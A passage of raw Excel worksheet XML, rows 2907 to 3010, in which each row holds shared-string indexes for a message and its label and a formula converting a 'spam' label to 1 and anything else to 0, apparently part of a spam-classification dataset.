    <row r="2907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2907" t="s">
        <v>8060</v>
      </c>
      <c r="B2907" t="s">
        <v>5294</v>
      </c>
      <c r="C2907" s="1">
        <f>IF(B2907="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2908" t="s">
        <v>8061</v>
      </c>
      <c r="B2908" t="s">
        <v>5294</v>
      </c>
      <c r="C2908" s="1">
        <f>IF(B2908="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2909" t="s">
        <v>8062</v>
      </c>
      <c r="B2909" t="s">
        <v>5294</v>
      </c>
      <c r="C2909" s="1">
        <f>IF(B2909="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2910" t="s">
        <v>8063</v>
      </c>
      <c r="B2910" t="s">
        <v>5297</v>
      </c>
      <c r="C2910" s="1">
        <f>IF(B2910="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2911" t="s">
        <v>8064</v>
      </c>
      <c r="B2911" t="s">
        <v>5294</v>
      </c>
      <c r="C2911" s="1">
        <f>IF(B2911="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2912" t="s">
        <v>5780</v>
      </c>
      <c r="B2912" t="s">
        <v>5294</v>
      </c>
      <c r="C2912" s="1">
        <f>IF(B2912="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2913" t="s">
        <v>8065</v>
      </c>
      <c r="B2913" t="s">
        <v>5294</v>
      </c>
      <c r="C2913" s="1">
        <f>IF(B2913="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2914" t="s">
        <v>8066</v>
      </c>
      <c r="B2914" t="s">
        <v>5294</v>
      </c>
      <c r="C2914" s="1">
        <f>IF(B2914="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2915" t="s">
        <v>8067</v>
      </c>
      <c r="B2915" t="s">
        <v>5297</v>
      </c>
      <c r="C2915" s="1">
        <f>IF(B2915="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2916" t="s">
        <v>8068</v>
      </c>
      <c r="B2916" t="s">
        <v>5294</v>
      </c>
      <c r="C2916" s="1">
        <f>IF(B2916="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2917" t="s">
        <v>8069</v>
      </c>
      <c r="B2917" t="s">
        <v>5294</v>
      </c>
      <c r="C2917" s="1">
        <f>IF(B2917="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2918" t="s">
        <v>8070</v>
      </c>
      <c r="B2918" t="s">
        <v>5294</v>
      </c>
      <c r="C2918" s="1">
        <f>IF(B2918="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2919" t="s">
        <v>8071</v>
      </c>
      <c r="B2919" t="s">
        <v>5294</v>
      </c>
      <c r="C2919" s="1">
        <f>IF(B2919="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2920" t="s">
        <v>8072</v>
      </c>
      <c r="B2920" t="s">
        <v>5294</v>
      </c>
      <c r="C2920" s="1">
        <f>IF(B2920="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2921" t="s">
        <v>8073</v>
      </c>
      <c r="B2921" t="s">
        <v>5294</v>
      </c>
      <c r="C2921" s="1">
        <f>IF(B2921="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2922" t="s">
        <v>8074</v>
      </c>
      <c r="B2922" t="s">
        <v>5294</v>
      </c>
      <c r="C2922" s="1">
        <f>IF(B2922="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2923" t="s">
        <v>8075</v>
      </c>
      <c r="B2923" t="s">
        <v>5294</v>
      </c>
      <c r="C2923" s="1">
        <f>IF(B2923="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2924" t="s">
        <v>8076</v>
      </c>
      <c r="B2924" t="s">
        <v>5294</v>
      </c>
      <c r="C2924" s="1">
        <f>IF(B2924="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2925" t="s">
        <v>8077</v>
      </c>
      <c r="B2925" t="s">
        <v>5294</v>
      </c>
      <c r="C2925" s="1">
        <f>IF(B2925="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2926" t="s">
        <v>8078</v>
      </c>
      <c r="B2926" t="s">
        <v>5294</v>
      </c>
      <c r="C2926" s="1">
        <f>IF(B2926="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2927" t="s">
        <v>8079</v>
      </c>
      <c r="B2927" t="s">
        <v>5294</v>
      </c>
      <c r="C2927" s="1">
        <f>IF(B2927="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2928" t="s">
        <v>8080</v>
      </c>
      <c r="B2928" t="s">
        <v>5294</v>
      </c>
      <c r="C2928" s="1">
        <f>IF(B2928="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2929" t="s">
        <v>8081</v>
      </c>
      <c r="B2929" t="s">
        <v>5294</v>
      </c>
      <c r="C2929" s="1">
        <f>IF(B2929="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2930" t="s">
        <v>8082</v>
      </c>
      <c r="B2930" t="s">
        <v>5294</v>
      </c>
      <c r="C2930" s="1">
        <f>IF(B2930="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2931" t="s">
        <v>8083</v>
      </c>
      <c r="B2931" t="s">
        <v>5294</v>
      </c>
      <c r="C2931" s="1">
        <f>IF(B2931="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2932" t="s">
        <v>8084</v>
      </c>
      <c r="B2932" t="s">
        <v>5294</v>
      </c>
      <c r="C2932" s="1">
        <f>IF(B2932="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2933" t="s">
        <v>8085</v>
      </c>
      <c r="B2933" t="s">
        <v>5294</v>
      </c>
      <c r="C2933" s="1">
        <f>IF(B2933="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2934" t="s">
        <v>8086</v>
      </c>
      <c r="B2934" t="s">
        <v>5294</v>
      </c>
      <c r="C2934" s="1">
        <f>IF(B2934="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2935" t="s">
        <v>8087</v>
      </c>
      <c r="B2935" t="s">
        <v>5294</v>
      </c>
      <c r="C2935" s="1">
        <f>IF(B2935="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2936" t="s">
        <v>8088</v>
      </c>
      <c r="B2936" t="s">
        <v>5294</v>
      </c>
      <c r="C2936" s="1">
        <f>IF(B2936="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2937" t="s">
        <v>8089</v>
      </c>
      <c r="B2937" t="s">
        <v>5294</v>
      </c>
      <c r="C2937" s="1">
        <f>IF(B2937="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2938" t="s">
        <v>8090</v>
      </c>
      <c r="B2938" t="s">
        <v>5294</v>
      </c>
      <c r="C2938" s="1">
        <f>IF(B2938="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2939" t="s">
        <v>8091</v>
      </c>
      <c r="B2939" t="s">
        <v>5294</v>
      </c>
      <c r="C2939" s="1">
        <f>IF(B2939="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2940" t="s">
        <v>8092</v>
      </c>
      <c r="B2940" t="s">
        <v>5294</v>
      </c>
      <c r="C2940" s="1">
        <f>IF(B2940="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2941" t="s">
        <v>8093</v>
      </c>
      <c r="B2941" t="s">
        <v>5297</v>
      </c>
      <c r="C2941" s="1">
        <f>IF(B2941="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2942" t="s">
        <v>8094</v>
      </c>
      <c r="B2942" t="s">
        <v>5294</v>
      </c>
      <c r="C2942" s="1">
        <f>IF(B2942="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2943" t="s">
        <v>8095</v>
      </c>
      <c r="B2943" t="s">
        <v>5294</v>
      </c>
      <c r="C2943" s="1">
        <f>IF(B2943="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2944" t="s">
        <v>7583</v>
      </c>
      <c r="B2944" t="s">
        <v>5294</v>
      </c>
      <c r="C2944" s="1">
        <f>IF(B2944="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2945" t="s">
        <v>8096</v>
      </c>
      <c r="B2945" t="s">
        <v>5297</v>
      </c>
      <c r="C2945" s="1">
        <f>IF(B2945="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2946" t="s">
        <v>8097</v>
      </c>
      <c r="B2946" t="s">
        <v>5294</v>
      </c>
      <c r="C2946" s="1">
        <f>IF(B2946="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2947" t="s">
        <v>8098</v>
      </c>
      <c r="B2947" t="s">
        <v>5294</v>
      </c>
      <c r="C2947" s="1">
        <f>IF(B2947="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2948" t="s">
        <v>8099</v>
      </c>
      <c r="B2948" t="s">
        <v>5294</v>
      </c>
      <c r="C2948" s="1">
        <f>IF(B2948="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2949" t="s">
        <v>8100</v>
      </c>
      <c r="B2949" t="s">
        <v>5294</v>
      </c>
      <c r="C2949" s="1">
        <f>IF(B2949="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2950" t="s">
        <v>8101</v>
      </c>
      <c r="B2950" t="s">
        <v>5294</v>
      </c>
      <c r="C2950" s="1">
        <f>IF(B2950="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2951" t="s">
        <v>8102</v>
      </c>
      <c r="B2951" t="s">
        <v>5294</v>
      </c>
      <c r="C2951" s="1">
        <f>IF(B2951="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2952" t="s">
        <v>8103</v>
      </c>
      <c r="B2952" t="s">
        <v>5294</v>
      </c>
      <c r="C2952" s="1">
        <f>IF(B2952="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2953" t="s">
        <v>8104</v>
      </c>
      <c r="B2953" t="s">
        <v>5294</v>
      </c>
      <c r="C2953" s="1">
        <f>IF(B2953="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2954" t="s">
        <v>8105</v>
      </c>
      <c r="B2954" t="s">
        <v>5297</v>
      </c>
      <c r="C2954" s="1">
        <f>IF(B2954="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2955" t="s">
        <v>8106</v>
      </c>
      <c r="B2955" t="s">
        <v>5294</v>
      </c>
      <c r="C2955" s="1">
        <f>IF(B2955="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2956" t="s">
        <v>8107</v>
      </c>
      <c r="B2956" t="s">
        <v>5294</v>
      </c>
      <c r="C2956" s="1">
        <f>IF(B2956="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2957" t="s">
        <v>8108</v>
      </c>
      <c r="B2957" t="s">
        <v>5294</v>
      </c>
      <c r="C2957" s="1">
        <f>IF(B2957="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2958" t="s">
        <v>8109</v>
      </c>
      <c r="B2958" t="s">
        <v>5294</v>
      </c>
      <c r="C2958" s="1">
        <f>IF(B2958="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2959" t="s">
        <v>6108</v>
      </c>
      <c r="B2959" t="s">
        <v>5297</v>
      </c>
      <c r="C2959" s="1">
        <f>IF(B2959="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2960" t="s">
        <v>8110</v>
      </c>
      <c r="B2960" t="s">
        <v>5294</v>
      </c>
      <c r="C2960" s="1">
        <f>IF(B2960="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2961" t="s">
        <v>8111</v>
      </c>
      <c r="B2961" t="s">
        <v>5294</v>
      </c>
      <c r="C2961" s="1">
        <f>IF(B2961="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2962" t="s">
        <v>8112</v>
      </c>
      <c r="B2962" t="s">
        <v>5294</v>
      </c>
      <c r="C2962" s="1">
        <f>IF(B2962="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2963" t="s">
        <v>8113</v>
      </c>
      <c r="B2963" t="s">
        <v>5294</v>
      </c>
      <c r="C2963" s="1">
        <f>IF(B2963="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2964" t="s">
        <v>8114</v>
      </c>
      <c r="B2964" t="s">
        <v>5294</v>
      </c>
      <c r="C2964" s="1">
        <f>IF(B2964="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2965" t="s">
        <v>8115</v>
      </c>
      <c r="B2965" t="s">
        <v>5297</v>
      </c>
      <c r="C2965" s="1">
        <f>IF(B2965="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2966" t="s">
        <v>8116</v>
      </c>
      <c r="B2966" t="s">
        <v>5294</v>
      </c>
      <c r="C2966" s="1">
        <f>IF(B2966="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2967" t="s">
        <v>8117</v>
      </c>
      <c r="B2967" t="s">
        <v>5294</v>
      </c>
      <c r="C2967" s="1">
        <f>IF(B2967="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2968" t="s">
        <v>6462</v>
      </c>
      <c r="B2968" t="s">
        <v>5294</v>
      </c>
      <c r="C2968" s="1">
        <f>IF(B2968="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2969" t="s">
        <v>8118</v>
      </c>
      <c r="B2969" t="s">
        <v>5294</v>
      </c>
      <c r="C2969" s="1">
        <f>IF(B2969="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2970" t="s">
        <v>8119</v>
      </c>
      <c r="B2970" t="s">
        <v>5294</v>
      </c>
      <c r="C2970" s="1">
        <f>IF(B2970="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2971" t="s">
        <v>8120</v>
      </c>
      <c r="B2971" t="s">
        <v>5294</v>
      </c>
      <c r="C2971" s="1">
        <f>IF(B2971="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2972" t="s">
        <v>5994</v>
      </c>
      <c r="B2972" t="s">
        <v>5294</v>
      </c>
      <c r="C2972" s="1">
        <f>IF(B2972="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2973" t="s">
        <v>8121</v>
      </c>
      <c r="B2973" t="s">
        <v>5294</v>
      </c>
      <c r="C2973" s="1">
        <f>IF(B2973="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2974" t="s">
        <v>8122</v>
      </c>
      <c r="B2974" t="s">
        <v>5294</v>
      </c>
      <c r="C2974" s="1">
        <f>IF(B2974="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2975" t="s">
        <v>8123</v>
      </c>
      <c r="B2975" t="s">
        <v>5294</v>
      </c>
      <c r="C2975" s="1">
        <f>IF(B2975="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2976" t="s">
        <v>8124</v>
      </c>
      <c r="B2976" t="s">
        <v>5294</v>
      </c>
      <c r="C2976" s="1">
        <f>IF(B2976="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2977" t="s">
        <v>8125</v>
      </c>
      <c r="B2977" t="s">
        <v>5294</v>
      </c>
      <c r="C2977" s="1">
        <f>IF(B2977="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2978" t="s">
        <v>8126</v>
      </c>
      <c r="B2978" t="s">
        <v>5294</v>
      </c>
      <c r="C2978" s="1">
        <f>IF(B2978="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2979" t="s">
        <v>8127</v>
      </c>
      <c r="B2979" t="s">
        <v>5294</v>
      </c>
      <c r="C2979" s="1">
        <f>IF(B2979="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2980" t="s">
        <v>8128</v>
      </c>
      <c r="B2980" t="s">
        <v>5297</v>
      </c>
      <c r="C2980" s="1">
        <f>IF(B2980="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2981" t="s">
        <v>8129</v>
      </c>
      <c r="B2981" t="s">
        <v>5294</v>
      </c>
      <c r="C2981" s="1">
        <f>IF(B2981="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2982" t="s">
        <v>6719</v>
      </c>
      <c r="B2982" t="s">
        <v>5294</v>
      </c>
      <c r="C2982" s="1">
        <f>IF(B2982="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2983" t="s">
        <v>8130</v>
      </c>
      <c r="B2983" t="s">
        <v>5294</v>
      </c>
      <c r="C2983" s="1">
        <f>IF(B2983="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2984" t="s">
        <v>8131</v>
      </c>
      <c r="B2984" t="s">
        <v>5294</v>
      </c>
      <c r="C2984" s="1">
        <f>IF(B2984="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2985" t="s">
        <v>8132</v>
      </c>
      <c r="B2985" t="s">
        <v>5294</v>
      </c>
      <c r="C2985" s="1">
        <f>IF(B2985="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2986" t="s">
        <v>8133</v>
      </c>
      <c r="B2986" t="s">
        <v>5294</v>
      </c>
      <c r="C2986" s="1">
        <f>IF(B2986="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2987" t="s">
        <v>8134</v>
      </c>
      <c r="B2987" t="s">
        <v>5297</v>
      </c>
      <c r="C2987" s="1">
        <f>IF(B2987="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2988" t="s">
        <v>8135</v>
      </c>
      <c r="B2988" t="s">
        <v>5294</v>
      </c>
      <c r="C2988" s="1">
        <f>IF(B2988="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2989" t="s">
        <v>8136</v>
      </c>
      <c r="B2989" t="s">
        <v>5294</v>
      </c>
      <c r="C2989" s="1">
        <f>IF(B2989="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2990" t="s">
        <v>8137</v>
      </c>
      <c r="B2990" t="s">
        <v>5297</v>
      </c>
      <c r="C2990" s="1">
        <f>IF(B2990="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2991" t="s">
        <v>6232</v>
      </c>
      <c r="B2991" t="s">
        <v>5294</v>
      </c>
      <c r="C2991" s="1">
        <f>IF(B2991="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2992" t="s">
        <v>6749</v>
      </c>
      <c r="B2992" t="s">
        <v>5297</v>
      </c>
      <c r="C2992" s="1">
        <f>IF(B2992="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2993" t="s">
        <v>8138</v>
      </c>
      <c r="B2993" t="s">
        <v>5294</v>
      </c>
      <c r="C2993" s="1">
        <f>IF(B2993="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2994" t="s">
        <v>8139</v>
      </c>
      <c r="B2994" t="s">
        <v>5294</v>
      </c>
      <c r="C2994" s="1">
        <f>IF(B2994="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2995" t="s">
        <v>8140</v>
      </c>
      <c r="B2995" t="s">
        <v>5294</v>
      </c>
      <c r="C2995" s="1">
        <f>IF(B2995="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2996" t="s">
        <v>8141</v>
      </c>
      <c r="B2996" t="s">
        <v>5294</v>
      </c>
      <c r="C2996" s="1">
        <f>IF(B2996="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2997" t="s">
        <v>8142</v>
      </c>
      <c r="B2997" t="s">
        <v>5294</v>
      </c>
      <c r="C2997" s="1">
        <f>IF(B2997="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2998" t="s">
        <v>8143</v>
      </c>
      <c r="B2998" t="s">
        <v>5294</v>
      </c>
      <c r="C2998" s="1">
        <f>IF(B2998="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2999" t="s">
        <v>8144</v>
      </c>
      <c r="B2999" t="s">
        <v>5294</v>
      </c>
      <c r="C2999" s="1">
        <f>IF(B2999="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3000" t="s">
        <v>8145</v>
      </c>
      <c r="B3000" t="s">
        <v>5294</v>
      </c>
      <c r="C3000" s="1">
        <f>IF(B3000="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3001" t="s">
        <v>8146</v>
      </c>
      <c r="B3001" t="s">
        <v>5294</v>
      </c>
      <c r="C3001" s="1">
        <f>IF(B3001="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3002" t="s">
        <v>8147</v>
      </c>
      <c r="B3002" t="s">
        <v>5297</v>
      </c>
      <c r="C3002" s="1">
        <f>IF(B3002="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3003" t="s">
        <v>8148</v>
      </c>
      <c r="B3003" t="s">
        <v>5294</v>
      </c>
      <c r="C3003" s="1">
        <f>IF(B3003="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3004" t="s">
        <v>6523</v>
      </c>
      <c r="B3004" t="s">
        <v>5294</v>
      </c>
      <c r="C3004" s="1">
        <f>IF(B3004="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3005" t="s">
        <v>7994</v>
      </c>
      <c r="B3005" t="s">
        <v>5297</v>
      </c>
      <c r="C3005" s="1">
        <f>IF(B3005="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3006" t="s">
        <v>8149</v>
      </c>
      <c r="B3006" t="s">
        <v>5294</v>
      </c>
      <c r="C3006" s="1">
        <f>IF(B3006="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3007" t="s">
        <v>8150</v>
      </c>
      <c r="B3007" t="s">
        <v>5294</v>
      </c>
      <c r="C3007" s="1">
        <f>IF(B3007="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3008" t="s">
        <v>8151</v>
      </c>
      <c r="B3008" t="s">
        <v>5294</v>
      </c>
      <c r="C3008" s="1">
        <f>IF(B3008="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3009" t="s">
        <v>5742</v>
      </c>
      <c r="B3009" t="s">
        <v>5297</v>
      </c>
      <c r="C3009" s="1">
        <f>IF(B3009="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3010" t="s">
        <v>8152</v>
      </c>
      <c r="B3010" t="s">
        <v>5297</v>
      </c>
      <c r="C3010" s="1">
        <f>IF(B3010="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
